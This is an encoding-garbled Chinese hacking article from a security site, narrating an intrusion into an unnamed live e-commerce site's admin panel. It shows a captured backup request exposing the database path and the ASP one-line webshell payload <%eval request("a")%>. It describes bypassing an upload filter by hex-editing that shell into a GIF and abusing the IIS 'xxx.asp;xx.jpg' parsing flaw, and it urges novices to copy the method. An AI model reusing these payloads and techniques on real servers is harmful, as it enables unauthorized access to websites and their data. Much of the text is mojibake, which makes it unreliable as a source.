Ê×Ò³ | °²È«ÎÄÕ | °²È«¹¤¾ß | Exploits | ±¾Õ¾Ô­´´ | ¹ØÓÚÎÒÃÇ | ÍøÕ¾µØͼ | °²È«ÂÛ̳
  µ±Ç°Î»ÖãºÖ÷Ò³>°²È«ÎÄÕÂ>ÎÄÕÂ×ÊÁÏ>ÈëÇÖʵÀý>ÎÄÕÂÄÚÈÝ
ÁíÀàÍøÕ¾ÈëÇÖÖ®Ò»¾ä»°Ä¾ÂíͼƬµÄÃîÓÃ
À´Ô´£ºvfocus.net ×÷Õߣºenjoyhack ·¢²¼Ê±¼ä£º2010-12-24  

ÕâƪÎÄÕÂÓеã±êÌâµ³ÁË£¬Ò»¾ä»°Ä¾Âí´ó¼Ò¶¼²»Ä°Éú£¬ÎÒÏëºÜ¶à²Ë²Ë¶¼ÌåÑé¹ýËûµÄÇ¿´óÖ®´¦°É¡£ÌáÆðÒ»¾ä»°ÎÒÃDz»ÓɵÃÏëÆðÁËlaker´óÏÀ°¡¡£¿ÉÒÔ˵laker´óÏÀµÄÒ»¾ä»°Ä¾ÂíÕæÊÇΪÎÒÃǹã´ó½Å±¾ÈëÇÖÕß´øÀ´²»Éٵķ½±ã¡£

        ½ñÌìÎÒÒª½²ÊöµÄÕâ¸öÈëÇÖ¹ý³Ì¾ÍºÍÒ»¾ä»°Ä¾ÂíÃܲ»¿É·Ö£¬Ëµµ½Õâ´ó¼ÒÓ¦¸Ã¶¼ÖªµÀ×îÖÕÄÃÏÂÕâ¸öÕ¾µÄµÄ·½·¨¿Ï¶¨ÊÇÀûÓÃÒ»¾ä»°ÁË¡£²»¹ýÕâ¸öÕ¾ÎÒ»¹ÊÇ·ÑÁ˺ôóÖÜÕ۲ųɹ¦ÄÃÏÂÒ»¾ä»°µÄ¡£ÏÂÃæÈÃÎÒÃÇÒ»Æð»Ø¹ËÏÂÕû¸ö¹ý³Ì°É¡£²»»áÊìÁ·Ê¹ÓÃÒ»¾ä»°µÄС²ËÃÇ¿ÉÒªÈÏÕæ¿´ÁË£¬ÄÜÊìÁ·ÔËÓÃÒ»¾ä»°µÄ´óϺÃÇÒ²²»Òª½¾°Á£¬Ëµ²»¶¨ÏÂÃæµÄ·½·¨¾ÍÊÇÄãûÓг¢ÊÔ¹ýµÄŶ¡£

        ºÃÁË£¬ÊÂÇéÆðÒò»¹ÊÇÒÔС²ËÄõ½ÁËÍøÕ¾ºǫ́û·¨ÄÃwebshell£¬ÕÒÎÒÇóÖúÀ´ÁË£¬ÎÒÃÇ»¹ÊÇÏȵ½ÍøÕ¾ºǫ́¿´¿´µ½µ×ÊÇʲôÑùÒ»¸ö×´¿ö°É¡£ÍøÖ·ÎҾͲ»·¢³öÀ´ÁË£¬ÃâµÃÓÐЩÈËÆ·²»ºÃµÄС²ËÃÇÄÃÈ¥¸ãÆÆ»µ¡£

        ÊÇÒ»¸öʲôµç×ÓÉ̳ǵĺǫ́£¬²»¹ýÎÒ֮ǰÔÚǰ̨¿´ÁËϸøÈ˵ĸоõ¾ÍÊDz»ÔõôÑù£¬¸ÕÄÇС²ËÓ¦¸Ã¾ÍÊÇͨ¹ý×¢È멶´Äõ½µÄÕ˺źÍÃÜÂë¡£´óÔ¼ÔÚºǫ́¿´ÁËÏ»ù±¾Çé¿ö£¬Ñ°ÕÒ¿ÉÀûÓõÄÐÅÏ¢£¬ÓÐÒ»¸öewebeditorµÄ±à¼­Æ÷£¬²»¹ýòËÆÊÇ2.16ÒÔÉÏ°æ±¾µÄ£¬²»´æÔÚ×¢È멶´£»ÁíÍâÓÐÒ»¸öͼƬÉÏ´«µÄ¹¦ÄÜ£»»¹ÓÐÒ»¸öÊý¾Ý¿â±¸·Ý»Ö¸´¹¦ÄÜ£¬´óÖÂÕâЩµØ·½¶¼ÊÇ¿ÉÒÔÀûÓõġ£²»¹ýewebeditorÎÒÒѾ­³¢ÊÔÁË£¬Ä¬ÈϵǼ½çÃæɾ³ý£¬Êý¾Ý¿âÃû³Æ¸ü¸Ä²»¿ÉÏÂÔØ¡£admin_style.aspÎļþÑéÖ¤·½Ê½¶ÀÁ¢£¬Ã»ÓÐÓëÖ÷Õ¾ºǫ́ʹÓÃͬһÖÖÑéÖ¤£¬ÓеÄÍøÕ¾µÄewebeditorµÄºǫ́ÑéÖ¤ÓëÍøÕ¾ºǫ́һֱ£¬Õâ¾Íµ¼ÖµÇ¼ÍøÕ¾ºǫ́ºó¾Í¿ÉÒÔÖ±½Ó·ÃÎʱ༭Æ÷ºǫ́³ÌÐò¡£ÁíÍâ¾ÍÊÇÊý¾Ý¿â±¸·Ý£¬´ó¼Ò¿ÉÒÔ¿´ÏÂͼ£º

        ¿É¼û¸Ã±¸·Ý¹¦Äܲ»¿É×Ô¶¨ÒåÔ´Êý¾Ý¿â·¾¶Ãû³Æ¼°±¸·ÝÖµÄÊýÊý¾Ý¿â·¾¶»òÃû³Æ£¬²»¹ýµ±Ê±¿´µ½ÕâÀïÎÒÐÄÀíÃæÓÐÁËÒ»¸öÏë·¨¾ÍÊǼÈÈ»²»¿ÉÒÔ×Ô¼º¶¨Òå·¾¶¼°Ãû³Æ£¬ÎÒ¿ÉÒÔ×Ô¼º×¥°üÈ»ºó¸ü¸ÄÊý¾Ý¿âºóÌá½»¡£Õâ¸ö·½·¨ÎÒÒÔÇ°ÔÚÆäËûÍøÕ¾ÉÏÓÐÊÔ¹ý£¬¶øÇҳɹ¦¹ý¡£Ö÷Òª¾ÍÊÇÕë¶ÔÀàËƵÄÊý¾Ý¿â±¸·Ý¹¦ÄÜ£¬Ê¹ÓÃ×¥°ü¹¤¾ß×¥ÏÂÀ´È»ºó¸ü¸ÄºóÔÙÓÃNCÌá½»¡£¾­¹ý²âÊÔÊÇ¿ÉÐеġ£Õâ¸ö·½·¨ÒÔºóÓÖ»ú»á¸ø´ó¼Òµ¥¶Àд¸öÎÄÕ³öÀ´£¬Õâ´ÎÕâÀï¾Í²»¶à˵ÁË¡£µ±È»Õâ¸öÍøÕ¾Ò²²»Ò»¶¨Äܳɹ¦£¬ÎÒÄ¿µÄÊÇÒªÕÒµ½Ò»¸ö¸ü·½±ãµÄÄÃwebshellµÄ°ì·¨£¬Èç¹ûÕÒµ½ÎÒÈÏΪ±ÈÕâ¸ö¸ü·½±ãµÄ°ì·¨Îҿ϶¨»áÏȳ¢ÊÔ£¬Èç¹û²»ÐÐÎÒÔÙÀ´³¢ÊԸղŵÄÏë·¨ÁË¡£

        ÔÙ¼ÌÐøÍùÏ¿´ÓÐÒ»¸öÊý¾Ý¿âÔÚÏ߸üÃûµÄ¹¦ÄÜ£º

        ¶øÇÒ»¹½¨ÒéÎÒʹÓÃaspµÄºó׺£¬Õâ²»ÊÇÃ÷°Ú×ÅÈÃÎÒÄÃwebshellÂ𣿺Ǻǣ¡£¡²»¹ýµ±Ê±ÎÒÔÚÕâÀﻹÊÇÓÌÔ¥ÁËһϣ¬ÐÄÏëÒªÊÇóȻµÄ°ÑÊý¾Ý¿â¸ü¸Ä³ÉÆäËûÎļþÃûÁË£¬Ò»µ©ÏµÍ³³ö´íÎÒÓв»ÖªµÀÔ­À´µÄÊý¾Ý¿âÃû£¬ÄDz»¾ÍÈ«ÍæÍê¶ù£¿²»¹ýÓÌÔ¥¹éÓÌÔ¥°É£¬ÎÒ»¹ÊÇÏÈ¿´¿´ÀûÓÃÕâ¸ö¹¦ÄÜÄÃwebshellµÄÇ°ÌáÌõ¼þ°É¡£Õâ¸öÇ°ÌáÌõ¼þ¾ÍÊÇÒªÕÒµ½Êý¾Ý¿â·¾¶¡£µ±È»ÒªÕÒÊý¾Ý¿â·¾¶µÄ»°ÔÚÕâÀïÖ±½Ó¸ÄÃû˵²»¶¨ÏµÍ³¾Í±¬³öÊý¾Ý¿â·¾¶ÁË£¬²»¹ýΪÁË°²È«Æð¼ûûÓÐÊ®×ã°ÑÎÕ»¹ÊDz»µÃðȻȥ¸ü¸ÄÊý¾Ý¿âÃû³Æ¡£

        ½ÓÏÂÀ´ÕÒÊý¾Ý¿â·¾¶µÄ°ì·¨ºÜ¼òµ¥Ö±½ÓÓÃÉÏÃæ˵µ½µÄÊý¾Ý¿â±¸·Ý¹¦ÄÜ£¬È»ºó×¥°ü£¡£¡ÎÒÔÚÐéÄâ»úÉÏÊÔÁËÏ£¬³É¹¦ÕÒµ½ÁËÊý¾Ý¿â·¾¶¡£²¶»ñµ½Êý¾Ý¿â±¸·Ý³ÌÐòµÄÊý¾Ý°üÈçÏ£º

================================================================================
POST /admin/safe5.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxx.com/admin/safe5.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: www.xxxx.com
Content-Length: 87
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQCBSRCR=AMDHANDDDJGIMMMIGNELCGLF; buyok=temp=login&sql=&admin=mingdadz; ASPSESSIONIDQSBCTRDR=AEPLBLEDMNBOAIHMDMFIIBKP

oldpath=..%2Fdata%2Fshopbackupd.asp&DBname=shopbackup.mdb&Submit=%B1%B8%B7%DD&backup=ok
================================================================================

        ×¢Òâ¿´×îºóµÄoldpath=ÕâÀï..%2Fdata%2Fshopbackupd.asp¾ÍÊÇÍøÕ¾µ±Ç°Ê¹ÓõÄÊý¾Ý¿â·¾¶ÁË£¬ºóÃæµÄ&DBname=shopbackup.mdb¾ÍÊDZ¸·ÝºóµÄÊý¾Ý¿â·¾¶¡£µ±Ç°Êý¾Ý¿â·¾¶ÖÐÄǸö%2F¾ÍÊÇ“/”£¬ËùÒÔÊý¾Ý¿â·¾¶¾ÍÊÇ../data/shopbackupd.aspÁË£¬¶øµ±Ç°Ö´ÐеÄÎļþ·¾¶ÔÚadminĿ¼Ï£¬“../”Õâ¸ö¾Í±íʾÉÏÒ»¼¶Ä¿Â¼£¡ËùÒÔ×îÖÕµÄÊý¾Ý¿â·¾¶¾ÍÊÇhttp://www.xxxxx.com/data/shopbackupd.aspÁË£¡ºÃÁËÊý¾Ý¿â·¾¶ÕÒµ½ÁË£¬¶øÇÒ»¹ÊÇasp¸ñʽµÄ£¬ÄÇÏÖÔÚÄÃwebshellµÄ˼·ÓÖ»»ÁË£¬¾Íû±ØҪʹÓÃÊý¾Ý¿â¸ÄÃûÄǸö¹¦ÄÜÁË£¬¿ÉÒÔÖ±½ÓÔÚºǫ́ÕÒ¸öµØ·½²åÈëÒ»¾ä»°Ä¾Âí¡£Ëµ¹é˵£¬ÔÛÃÇ»¹ÊÇÏÈÀ´¿´¿´Êý¾Ý¿âÇé¿ö°É£¬»³×ż¤¶¯µÄÐÄÇéÖ±½Ó·ÃÎÊÊý¾Ý¿âÈ´·µ»ØÒÔÏ´íÎó£¡

        ѾѾµÄ£¬¿´À´ÊǹÜÀíÔ±ÔÚÊý¾Ý¿âÖÐ×öÁËÊֽţ¬ÏëÈÃASP³ÌÐòÔÚÊý¾Ý¿âÖеò»µ½Õý³£µÄÔËÐУ¬ËùÒÔËûÔÚÊý¾Ý¿âµÄ×îÇ°Ãæ¾Í¸ãÒ»¸öASPµÄ´íÎó³öÀ´£¬ÕâÑùºóÃæµÄASP³ÌÐò¾ÍµÃ²»µ½Ö´ÐÐÁË£¬ÄÇÎÒÃǾÍËã²åÈëÒ»¾ä»°£¬µÃ²»µ½Ö´ÐÐÒ²ÊÇ°×´î°¡¡£ÒªÏëͨ¹ýÊý¾ÝÄÚÈݵķ½·¨ÖÕ½áµôËûÕâ¸ö´íÎóµÄ»°ÄǼ¸ºõÊDz»¿ÉÄܵİ¡¡£ÎÒÊÔ¹ýÊäÈë%><%eval request("a")%>ÕâÑùµÄ±äÐÎÒ»¾ä»°¶¼Ã»ÄÜÖÕ½áµôËûÕâ¸ö´íÎ󡣿´À´Õâ¸öÄÃwebshellµÄ˼·¼°ÄǸö¸ÄÃû¶¼ÒªÐû¸æʧ°ÜÁË¡£

        ¼ÈÈ»ÕâÑùÄÇÖ»ºÃÔÙÑ°Ëû·ÁË£¬Õâ¸öʱºò»¹ÊÇÏëµ½ÀûÓÃÊý¾Ý¿â±¸·ÝÄÄÀÏë×¥°ü¸ü¸ÄÊý¾Ý°üÔÙNCÌá½»£¬²»¹ýÕâ¸ö»¹ÊÇÒªÓÐÇ°ÌáÌõ¼þµÄÀ²£¬Ç°ÌáÊÇÒªÉÏ´«Ò»¸öͼƬ¸ñʽµÄľÂí£¬È»ºóÔÙ°ÑÊý¾Ý°üÖÐÔ´Êý¾Ý¿â·¾¶Ìæ»»³ÉÉÏ´«µÄͼƬÂí£¬Ôٰѱ¸·Ý³ÉµÄÊý¾Ý¿âÀ©Õ¹Ãû¸ü¸Ä³Éasp¡¢asa¡¢cer»òÕßcdxµÈ·þÎñÆ÷¿ÉÒÔÖ´Ðеĸñʽ¡£oldpath=..%2Fdata%2Fshopbackupd.asp&DBname=shopbackup.mdbÒ²¾ÍÊÇÕⲿ·Ö£¬µ±È»¸ü¸Ä֮ǰҪ¼ÆËãºÃÊý¾Ý°üµÄ´óС¡£Ïëµ½ÕâÀÄÇÏÖÔÚ¾ÍҪȥÕÒ¸öÉÏ´«Í¼Æ¬µÄµØ·½ÁË£¬Õâ¸ö¿ÉÈÝÒ׶àÁË£¬ÍøÕ¾ÓÐÖ±½ÓÉÏ´«Í¼Æ¬µÄ³ÌÐò£¬¶øÇÒ»¹Óиö±à¼­Æ÷£¬¿ÉÒÔ˵ÉÏ´«Í¼Æ¬ÂíÓ¦¸ÃÊÇûÎÊÌâµÄÁË¡£

        ֮ǰÎÒÒ²¿´¹ýËûÍøÕ¾×Ô´øµÄÒ»¸öÉÏ´«Í¼Æ¬µÄ³ÌÐò£¬´óÔ¼¿´ÁËÏÂûʲô¿ÉÀûÓõģ¬Õâ´ÎÔٴδò¿ª£¬È»ºóÉÏ´«Ò»¸öͼƬÂí¡£

        ÌáʾÉÏ´«³É¹¦ÁË£¬µã»÷Ô¤ÀÀÉÏ´«µÄÎļþ¿´¿´£¬½á¹û¿´µ½µÄÈ·ÊÇһƪ¿Õ°×¡£

        ѾѾµÄ£¬±­¾ßÁË¡£¡£¡£°´Àí˵ÉÏ´«³É¹¦·ÃÎÊÓ¦¸ÃÊÇÒ»¸öͼƬµÄX²Å¶Ô°¡£¬ÔõôÊÇһƪ¿Õ°×ÄØ£¬ÎҲ鿴ԴÂëÒ²ÊÇһƬ¿Õ°×¡£Ñ¾Ñ¾µÄ£¬ÓÃÕâ¸ö²»ÐÐÔÛ»»ewebeditorÉÏ´«Í¼Æ¬ÔÙÊÔÊÔ£¬½á¹û»¹ÊÇһƬ¿Õ°×£¬ÎÒÓôÃÆÁË¡£ÄѵÀÊǸøɱÁË£¿È»ºóÎÒÉÏ´«Ò»¸ö¼ÓÃܵÄaspÂíÒ²ÊÇ£¬ÄѵÀÎÒ¼ÓÃܵÄÒ²¸øɱ£¿½Ó×ÅÎÒÓÖ»»Í¼Æ¬Àï²åÈëÁËÒ»¾ä»°µÄÉÏÈ¥Ò²ÊÇÒ»Ñù£¬¶¼ÊÇ¿Õ°×£¬¶øÎÒÉÏ´«Õý³£µÄͼƬȴûÎÊÌâ¡£ÎÒ²åѽ¡£¡£×îÖÕÊÔÁË°ëÌ죬×ܽá³öÀ´ÁË£¬ÊÇͼƬÀïÃæ´øÓÐ<%%>·ûºÅµÄ´«ÉÏÈ¥¶¼Êǿհס£¡£¡£¶ø²»´ø·ûºÅµÄ´«ÉÏÈ¥¶¼Ã»ÎÊÌâ¡£¡£ÎҲ廹Èò»ÈÃÈË»îÁË£¿£¿£¿Í¼Æ¬Ä¾Âí´«²»ÉÏÈ¥¾ÍËãÄǸö×¥°üµÄÊý¾Ý¿â±¸·ÝÄܳɹ¦ÓÖÓÐɶÓÃÄØ¡£¡£ÚÀ¡£µ½ÕâÀïÎÒ¼¸ºõ¶¼Ïë·ÅÆúÁË¡£

        ²»¹ý£¬¾ÍÔÚÎҹĵ·Õâ¸öÉÏ´«Í¼Æ¬µØ·½µÄʱºòÎÒżȻ·¢ÏÖÒ»¸öµØ·½£¬ºÜÊÇÈÃÎÒÐË·Ü£¡£¡¿´ÏÂͼ£º

 

        ×Ðϸ¿´ÕâÁ½¸öͼ£¬ÉÏͼÊÇÉÏ´«Îļþ֮ǰµÄ½Øͼ£¬ÏÂͼÊÇÉÏ´«ÎļþÖ®ºóµÄ½Øͼ£¬·¢ÏÖÓÐʲôÎÊÌâÁËÂ𣿹þ¹þ£¬Èç¹ûÄãû·¢ÏÖÈÃÎÒÀ´¸æËßÄ㣬×Ðϸ¿´ÉÏͼÖеØÖ·À¸ÀïÃæµÄµØÖ·£¬È»ºó¿´ÏÂͼÖÐÎļþÉÏ´«Ö®ºóµÄ·¾¶¡£·¢ÏÖÁËÂð£¿ÉÏͼÖÐÓиö0325£¬ÏÂͼÖÐͼƬÃû³Æ¾ÍÊÇ0325£¬¹þ¹þ¿´µ½ÕâÀïÎÒÒ²ºÜÐË·Ü£¬ÄѵÀÊÇͼƬµÄÃüÃû¹æÔòÊǸù¾ÝÉÏͼÖÐfupnamµÄÖµÀ´ÃüÃûµÄ£¿Èç¹ûÕæÒªÊÇÕâÑùµÄ»°£¬ÄǾͿÉÒÔÀûÓÃIISµÄ½âÎö©¶´ÁË£¡ÎªÁËÑéÖ¤ÎÒµÄÏë·¨£¬ÎÒ°É·¾¶¸ü°®³ÉÁËÕâÑù£¡È»ºóÉÏ´«²åÈëÁËÒ»¾ä»°¿Í»§¶ËµÄͼƬÎļþ£¬×¢ÒâºìÏß±ê×¢µÄµØ·½¡£

        Ìáʾ³É¹¦ÉÏ´«£¬¼ûÏÂͼ£º

        ¿´µ½ÁËÂ𣿶àôÒùµ´µÄÒ»¸öͼƬÎļþÃû°¡¡£¡£¡£²»¹ý£¬ÔÚµã»÷Ô¤ÀÀÉÏ´«ÎļþµÄʱºò¿´µ½µÄͼƬ»¹ÊÇһƬ¿Õ°×£¬ÎÒÓôÃÆÁË¡£¡£¡£ÄѵÀ·ÇÒªÈÃÎÒÈç´Ë±­¾ß£¿£¿

        ×öµ½ÕâÀ¼¸ºõÓÖÈÃÎÒ½øÈë·ÅÆúµÄ±ßÔµ£¬¾­¹ýÀ侲˼¿¼ºó¾ö¶¨´ÓÉÏ´«µÄͼƬÈëÊÖ¡£Ö®Ç°Óп´µ½¹ýÒ»¸ö½Ì³ÌÖÐʹÓõIJåÈëÓÐÒ»¾ä»°¿Í»§¶ËµÄͼƬÄÜÕý³£ÏÔʾ£¬¶øÎÒ×Ô¼ºµÄÈ´ÊDz»ÄÜÕý³£ÏÔʾԭͼµÄ¡£Ã²ËÆÄǸö½Ì³ÌÖÐÓÐÌáµ½¹ý˵ÄǸöͼƬÊÇʹÓÃÊ®Áù½øÖƱ༭¹ýµÄ¡£ÄѵÀÊÇÔÚÊ®Áù½øÖÆģʽϲåÈëµÄÒ»¾ä»°¿Í»§¶Î£¿¶øÎÒ²åÈëÒ»¾ä»°¿Í»§¶ËµÄ·½Ê½ÊÇÖ±½ÓÓüÇʱ¾´ò¿ªÍ¼Æ¬Îļþ£¬È»ºóÔÚ½áβ´¦²åÈë¡£

        ¾­¹ýÈç´ËÒ»·ÖÎö£¬ÎÒ¾ö¶¨ËÀÂíµ±»îÂíÒ½ÁË£¬ÏÈÕÒÁËÒ»¸öÕý³£ÏÔʾµÄgifͼƬ£¬È»ºóÓÃC32Ê®Áù½øÖƱ༭£¬ÎªÁËÑéÖ¤ÔÚÊ®Áù½øÖÆģʽϱ༭ºóͼƬÄÜÕý³£ÏÔʾ£¬ÎÒÊ×ÏÈÔÚ½áβËæ±ã²åÈëÁ˵ãÄÚÈÝ£¬È»ºó±£´æͼƬ£¬²é¿´Í¼Æ¬ÏÔʾÕý³£¡£

        Èç´ËÕÛÌÚÒ»·¬ºóÈ·¶¨ÔÚÊ®Áù½øÖÆģʽϱ༭µÄͼƬÄÜÕý³£ÏÔʾºó£¬ÎÒ¾ÍÔÚ×îºóÖ±½ÓдÉÏÁËÒ»¾ä»°¿Í»§¶Ë¡£È»ºóÔÙ±£´æ²âÊÔ£¬ÒÀÈ»Õý³£ÏÔʾ£¬²¢ÇÒÎÒ»¹½«Í¼Æ¬Ãû³Æ¸ü¸Ä³Éxxx.asp;xx.jpg¸ñʽ£¬È»ºó·Åµ½ÎÒµçÄÔµÄASPÔËÐл·¾³Ï²âÊÔ£¬ÄÜÕý³£Ê¹ÓÃÒ»¾ä»°Á¬½Ó¡£

        ²»¹ýÔÚ¶ÔÓÃÊ®Áù½øÖƱ༭¹ýºóµÄͼƬÓüÇʱ¾´ò¿ª²é¿´ÒÀÈ»ÄÜ¿´µ½Ö±½ÓµÄÃ÷ÎÄ<%eval request("a")%>£¬ÉÏÎÄ˵¹ý£¬ÄǸöÉÏ´«Í¼Æ¬¶ÔͼƬÑéÖ¤ºÜÑϸñ£¬ËùÓÐÄÚÈݵ±Öаüº¬ÓÐ<%%>·ûºÅµÄÉÏ´«ÉÏÈ¥ºó·ÃÎʶ¼Êǿհס£²»ÖªµÀÕâ´ÎÄܲ»Äܳɹ¦¹²ÄØ¡£Æäʵµ±Ê±Ò²Ã»±§¶à´óµÄÏ£ÍûÉÏ´«ÁËʹÓÃÊ®Áù½øÖƸü¸Ä¹ýµÄͼƬ¡£ÉÏ´«³É¹¦ºóÈ¥·ÃÎÊ£¬Õâ´ÎͼƬ¾ÍÀÏÀÏʵʵµÄÏÔʾ³öÀ´ÁË¡£

        ½ô½ÓמÍÊÇÈÃlakerµÄÒ»¾ä»°Á¬½Ó¶ÎÉϳ¡ÁË£¬³­³öÎÒÃÀ»¯¹ýµÄlakerÒ»¾ä»°Á¬½Ó¶Î£¬ÌîÉϵØÖ·ÃÜÂë½øÐÐÁ¬½Ó¡£

  

        ¹þ¹þ£¬¿´µ½ÁË°Ñ£¬Ò»¾ä»°³É¹¦µÄÖ´ÐÐÁË£¬½ÓÏÂÀ´ÄÃwebshellÄǾÍÊÇÒ×Èç·´ÕƵÄÊÂÇéÁË£¬×ܵÄÀ´ËµÕâ´ÎÄÃÏÂÕâ¸öÕ¾Ö÷ÒªµÄ·½·¨»¹ÊÇÒ»¾ä»°+IIS½âÎö©¶´ÁË¡£²»¹ýÕâ¸öÒ»¾ä»°Ö»¾­¹ýÌØÊâ´¦ÀíµÄŶ£¬ÎÒÏëÕâ¸öÊ®Áù½øÖƱ༭һ¾ä»°Í¼Æ¬Âí¶Ô¸ßÊÖÀ´ËµÓ¦¸ÃûʲôÁË£¬²»¹ý¶ÔС²ËÃÇÀ´ËµÓ¦¸ÃÊÇÒ»¸öºÜ²»´íµÄ¼¼ÊõÀ²¡£µ±È»ÎÒ֮ǰҲ²»ÖªµÀµÄ£¬ÒÔÇ°ÄÃÀàËƵÄÕ¾ÎÒ¶¼ÊÇÓÃÖ±½ÓÓüÇʱ¾±à¼­µÄÒ»¾ä»°Í¼Æ¬Âí×öµÄ£¬Õâ´ÎÓöÉϵĻ¹ÊÇÍ·Ò»´Î°¡¡£²»¹ý×Ô¼ºÒ²ÓÐËùÊÕ»ñ¡£ÖÁÉÙÎÒÒÔºóµÄÒ»¾ä»°Í¼Æ¬Âí¶¼»áʹÓÃÊ®Áù½øÖƱ༭¹ýµÄ£¬±È֮ǰÓõĿ϶¨Òª¸ß¼¶µãÁË¡£½¨ÒéС²ËÃÇÏÂÀ´Ò²×Ô¼º×öÒ»¸öÊôÓÚ×Ô¼ºµÄÒ»¾ä»°Í¼Æ¬Âí°É£¬ºÜʵÓõġ£


 
[ÍƼö] [ÆÀÂÛ(4Ìõ)] [·µ»Ø¶¥²¿] [´òÓ¡±¾Ò³] [¹Ø±Õ´°¿Ú]  
ÄäÃûÆÀÂÛ
ÆÀÂÛÄÚÈÝ£º(²»Äܳ¬¹ý250×Ö£¬ÐèÉóºËºó²Å»á¹«²¼£¬Çë×Ô¾õ×ñÊØ»¥ÁªÍøÏà¹ØÕþ²ß·¨¹æ¡£
 ¡ì×îÐÂÆÀÂÛ£º
  ÈȵãÎÄÕÂ
¡¤0dayÅúÁ¿ÄÃÕ¾webshell£¬ÍÚ¾ò»úÊÇ
¡¤ÀûÓÃewebeditor 5.5 - 6.0 ¼¦Àß
¡¤OmniPeek×¥°üµÄÒ»µã¿´·¨
¡¤Ç¿´óµÄÐá̽¹¤¾ßettercapʹÓý̳Ì
¡¤WindowsϵͳÃÜÂëÆƽâÈ«¹¥ÂÔ
¡¤Æƽâ½ûÖ¹SSID¹ã²¥
¡¤XSS͵ȡÃÜÂëCookiesͨÓýű¾
¡¤XSS©¶´»ù±¾¹¥»÷´úÂë
¡¤Intel 3945ABGÓÃOmniPeek 4.1×¥
¡¤KesionCMS V7.0¿ÆÑ´ÄÚÈÝÍøÕ¾¹ÜÀí
¡¤ÆƽâÎÞÏß¹ýÂËMAC
¡¤Metasploit ȨÏÞÌáÉý
  Ïà¹ØÎÄÕÂ
¡¤The Operation Outbreak Attack
¡¤Metasploit with MYSQL in BackT
¡¤°¡½­Í³¼ÆϵͳV1.6 °æ±¾ºǫ́ÄÃSHE
¡¤Ê±¼äºÍ״̬£ºÀûÓ鶴¸Ä±äÓÎÏ·½Ç
¡¤Exploitation Without A TTY
¡¤³¤´ï1Äê°ëµÄÒ»´Î¼èÄÑÉø͸
¡¤WindowsϵͳÃÜÂëÆƽâÈ«¹¥ÂÔ(hash
¡¤±©Á¦ÆƽâaspÒ»¾ä»°[php°æ]
¡¤GREÊý¾Ý°ü×¢Èë¹¥»÷
¡¤oracleµÍȨÏÞÏ»ñÈ¡shell
¡¤WebLogic¼òµ¥×¥¼¦´ó·¨
¡¤Í¨¹ýºǫ́ץ°ü±¸·ÝÄÃwebshellÉø͸
  ÍƼö¹ã¸æ
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved